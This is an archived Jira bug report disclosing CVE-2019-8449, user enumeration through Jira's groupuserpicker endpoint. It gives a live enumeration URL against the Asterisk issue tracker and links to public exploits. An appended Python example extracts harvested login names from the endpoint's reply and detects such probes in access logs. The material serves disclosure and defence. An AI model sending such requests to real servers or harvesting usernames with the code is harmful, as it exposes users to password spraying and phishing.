[asterisk-bugs] [JIRA] (ASTERISK-29249) Bug Report #21J59 (User enumeration through the groupuserpicker api resource - CVE-2019-8449)
Sound Ground (JIRA)
noreply at issues.asterisk.org
Sat Jan 16 06:43:59 CST 2021
Sound Ground created ASTERISK-29249:
---------------------------------------
Summary: Bug Report #21J59 (User enumeration through the groupuserpicker api resource - CVE-2019-8449)
Key: ASTERISK-29249
URL: https://issues.asterisk.org/jira/browse/ASTERISK-29249
Project: Asterisk
Issue Type: Bug
Security Level: None
Components: Applications/app_amd
Affects Versions: 17.0.1
Reporter: Sound Ground
Severity: Minor
Hello
I found a bug: user enumeration through the groupuserpicker API resource - CVE-2019-8449
Summary:
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
Steps to reproduce:
Simply visit the URL to see:
https://issues.asterisk.org/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
CVE: CVE-2019-8449
Fix:
Update your vulnerable version to 8.12.0 or higher.
References:
http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
Exploit:
https://www.exploit-db.com/exploits/47990
https://jira.atlassian.com/browse/JRASERVER-69796
--
This message was sent by Atlassian JIRA (v6.2#6252)
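The report above only says to visit the groupuserpicker URL. As an added example (not part of the original bug report, and not Jira or Asterisk project code), the block below shows what an attacker actually harvests from such a reply and what a defender can look for in an access log: it parses a constructed JSON reply shaped like the groupuserpicker response (the field layout is assumed from the public Jira REST API documentation, the user records are invented), flags request lines that hit the endpoint anonymously or with an oversized maxResults (log lines are constructed in a simplified combined-log layout, not copied from any real Jira instance), and checks a version string against the 8.4.0 threshold quoted in the CVE summary.

```python
"""Added example: harvest and detect Jira groupuserpicker user enumeration
(CVE-2019-8449). Not project code; response shape and log format are assumed."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed reply shaped like /rest/api/latest/groupuserpicker output
# (shape assumed from Jira REST docs; all values are invented).
SAMPLE_RESPONSE = json.dumps({
    "users": {
        "users": [
            {"name": "alice", "key": "alice", "displayName": "Alice Adams",
             "html": "<strong>A</strong>lice Adams - alice"},
            {"name": "bob.b", "key": "bob.b", "displayName": "Bob Brown",
             "html": "Bob Brown - bob.b"},
        ],
        "total": 2,
        "header": "Showing 2 of 2 matching users",
    },
    "groups": {"groups": [{"name": "jira-users", "html": "jira-users"}],
               "total": 1, "header": "Showing 1 of 1 matching groups"},
    "total": 3,
})

# Constructed access-log lines: client IP, authenticated user ("-" = anonymous),
# timestamp, request line, status, bytes. Simplified layout, not a real Jira log.
SAMPLE_LOG = [
    '203.0.113.7 - [16/Jan/2021:06:40:01 -0600] "GET /rest/api/latest/groupuserpicker'
    '?query=1&maxResults=50000&showAvatar=true HTTP/1.1" 200 48211',
    '198.51.100.2 jsmith [16/Jan/2021:06:41:10 -0600] "GET /rest/api/latest/groupuserpicker'
    '?query=al&maxResults=20 HTTP/1.1" 200 312',
    '198.51.100.2 jsmith [16/Jan/2021:06:41:11 -0600] "GET /rest/api/2/groupuserpicker'
    '?query=a&maxResults=50000 HTTP/1.1" 200 48211',
    '203.0.113.7 - [16/Jan/2021:06:42:00 -0600] "GET /browse/ASTERISK-29249 HTTP/1.1" 200 10342',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def extract_usernames(body):
    """Return the login names disclosed by a groupuserpicker reply, sorted."""
    data = json.loads(body)
    users = data.get("users", {}).get("users", [])
    # "name" is the login name, which is what an attacker feeds into a
    # password-spraying or phishing list; displayName alone is less useful.
    return sorted({u["name"] for u in users if "name" in u})


def is_enumeration_probe(line, max_results_threshold=1000):
    """True if the log line is a groupuserpicker request made anonymously or
    with a maxResults value far larger than any interactive picker would use."""
    m = LOG_RE.match(line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    # Match any REST API version prefix (latest, 2, ...) of the endpoint.
    if not parts.path.rstrip("/").endswith("/groupuserpicker"):
        return False
    qs = parse_qs(parts.query)
    try:
        max_results = int(qs.get("maxResults", ["0"])[0])
    except ValueError:
        max_results = 0
    anonymous = m.group("user") in ("-", "anonymous")
    return anonymous or max_results >= max_results_threshold


def flag_probes(lines):
    """Return the client IPs of flagged lines, in log order (duplicates kept)."""
    return [LOG_RE.match(l).group("ip") for l in lines if is_enumeration_probe(l)]


def is_vulnerable_version(version):
    """Versions below 8.4.0, the fix version quoted in the CVE summary, are affected."""
    return tuple(int(p) for p in version.split(".")) < (8, 4, 0)


if __name__ == "__main__":
    print("harvested:", extract_usernames(SAMPLE_RESPONSE))
    print("probe sources:", flag_probes(SAMPLE_LOG))
    print("8.3.4 vulnerable:", is_vulnerable_version("8.3.4"))
```

The anonymous-session test is the one that matters for this CVE: after the fix the endpoint returns 401 to unauthenticated callers, so an anonymous request that received a 200 is both a sign of an unpatched instance and of someone enumerating it. The maxResults threshold catches authenticated bulk dumps, which the patch does not prevent.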